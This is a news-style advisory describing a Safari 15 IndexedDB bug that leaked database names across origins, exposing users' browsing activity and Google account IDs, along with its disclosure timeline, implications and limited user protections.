Safari 15 implements the IndexedDB API, which introduces a data leak that allows websites to track the user’s internet activity and disclose their identity. FingerprintJS reported this bug to the WebKit Bug Tracker on November 28, 2021, which is tracking it as bug 233548. Apple’s engineers were working on the fix as of January 16, 2022 and marked it as resolved by January 17. However, the fix hasn’t been released as of January 19, leaving these browsers vulnerable for the time being.
Browsers use IndexedDB to store significant amounts of data on the client side. All major browsers support it, making IndexedDB a commonly used API. This API operates at a low level, so developers often encapsulate it within a wrapper that abstracts its functions, making it easier to use.
IndexedDB follows the same-origin policy, like most modern browsers. This policy places restrictions on the ways in which documents and scripts loaded from one origin can interact with resources from other origins. In particular, documents and scripts should never be allowed to interact with databases from other origins under the same-origin policy. An origin in this context is defined by the scheme, hostname and URL port used to access it, such that each indexed database is associated with a specific origin.
Description
The IndexedDB API in Safari 15 as well as all browsers on iOS and iPadOS is violating the same-origin policy. Each time one of these browsers interacts with a database, the browser creates a new database known as a cross-origin duplicated database. This database is empty and has the same name in all other active frames, tabs and windows within that browser session. Tabs and windows usually share the same session, unless the user switches to a different profile or opens a private window.
The leakage of database names between origins is an obvious privacy violation, as it allows other websites to access a user’s browsing history, even in different windows or tabs. This capability results from the general tendency for database names to be unique and website-specific. Furthermore, websites such as Calendar, Google, Google Keep and YouTube use database names that contain the user’s authenticated Google User ID, allowing malicious actors to uniquely identify authenticated users. In cases where the user is logged into multiple accounts, websites may also create a separate cross-origin duplicated database for each account.
Implications
The most serious implication of bug 233548 is that a malicious actor can obtain a user’s identity. They can also link multiple accounts belonging to the same user without requiring the user to take any specific action. All actors need to do is create a tab or window on a website that continually queries IndexedDB for available databases, which provides the other websites the user is visiting in real time. Another possible exploit of this bug is to open a website in a popup window or iframe, thus triggering an IndexedDB leak for that website.
Protection
Safari, iPadOS and iOS users can’t easily protect themselves from bug 233548 until Apple releases a fix for it. They can prevent JavaScript from running on their browser by default and only allow it to run on trusted sites, but this is unlikely to be a practical solution for most users due to the heavy reliance modern websites have on JavaScript. Furthermore, techniques like cross-site scripting can also target trusted sites, although with greater difficulty than untrusted sites. Safari users on Macs can simply switch to another browser until a fix is available, but iOS and iPadOS users don’t have this option since these operating systems don’t allow third-party browsers.
Solución fallo en Safari búsqueda en iPhone, iPad y Mac flickr photo by iphonedigital shared under a Creative Commons (BY-SA) license
